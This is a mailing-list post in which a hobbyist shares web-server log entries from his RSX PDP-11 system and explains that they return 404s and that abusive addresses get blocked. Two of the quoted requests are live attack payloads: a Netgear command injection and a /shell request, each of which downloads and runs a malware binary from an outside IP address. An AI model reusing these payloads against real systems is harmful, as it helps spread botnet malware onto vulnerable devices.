[Info-vax] Anti-virus ?

Johnny Billquist bqt at softjar.se
Mon Aug 14 19:04:53 EDT 2023 

On 2023-08-14 16:11, plugh wrote:
> On Monday, August 14, 2023 at 4:12:37 AM UTC-7, Johnny Billquist wrote:
>> Examples:
>>
>> . GET /wp-login.php
>>
>> (seems to be just lots of these probing if wordpress is running on the
>> host, so lots of variations on this one...)
>>
>>
>> . GET
>> /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http:/60.189.27.88:43788/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
>>
>> (I think we can safely assume thatn 60.189.27.88 isn't an official site
>> of netgear configurations...)
>>
>>
>> . GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws
>>
>> (Do people really setup their web servers to have shell as a CGI???)
>>
>>
>> Those are just a few examples from just a couple of hours of logs on my
>> RSX machine...
>>
>> Johnny
> 
> How is RSX configured to respond to these requests? It's impressive how many of these requests can be stuffed into the pipeline from one IP.

Most if that stuff simply generates 404, since there is no such URI that 
is valid in my system. (Why would I even set it up to accept something 
to /wp-login.php". I don't even have PHP under RSX...)

> I'm particularly impressed by attacks from soi-disant whitehats.
> 
> It was one of my first tests of generative AI: Translate the phrase “va fa culo” from Italian to at 10 different languages including Klingon, Esperanto, English. Include at least one rte language
> 
> As part of a "get off my servers" message to one of them. It's a nice form of extortion.

:-)

> It doesn't seem much use to have these sorts of logs with an active response component. Certainly writing emails is fun, but it can accomplish only so much. Most of the WordPress stuff has to be blocked by packet filtering after so many of these attempts from the same address. Some of these clowns have to invest serious money to get blocks of IP addresses from which to launch these attacks. Yes, WordPress certainly has a big target on its back: "Interesting birthmark you got there, Hal"
> I mean how many "get wplogin" requests do you allow before blocking that address? If the rsx system is just a honeypot, nevermind.

It's not a honeypot. My RSX systems are doing legit stuff.
I log every request over http, just as I log all sessions talking to 
SMTP, FTP, and other bits. That system serves on average about 0.5G of 
useful data per day. Which is not bad for a PDP-11 system... (A lot of 
it is web crawlers, though, like Google.)

I don't in general filter anything. I see this as the most excellent 
testing setup to figure and fix any problems I can spot. The more abuse, 
the better the system becomes. It's now at a point where I can't really 
remember when I last had some serious problem.

However, yes, there is a "defence" mechanism. If the system detects a 
lot of "bad" traffic from an address, it will eventually get blocked, 
and the block will only drop once there is no traffic from that address 
for a certain amount of time. And of course, if they start abusing 
again, they will get blocked again.

   Johnny

More information about the Info-vax mailing list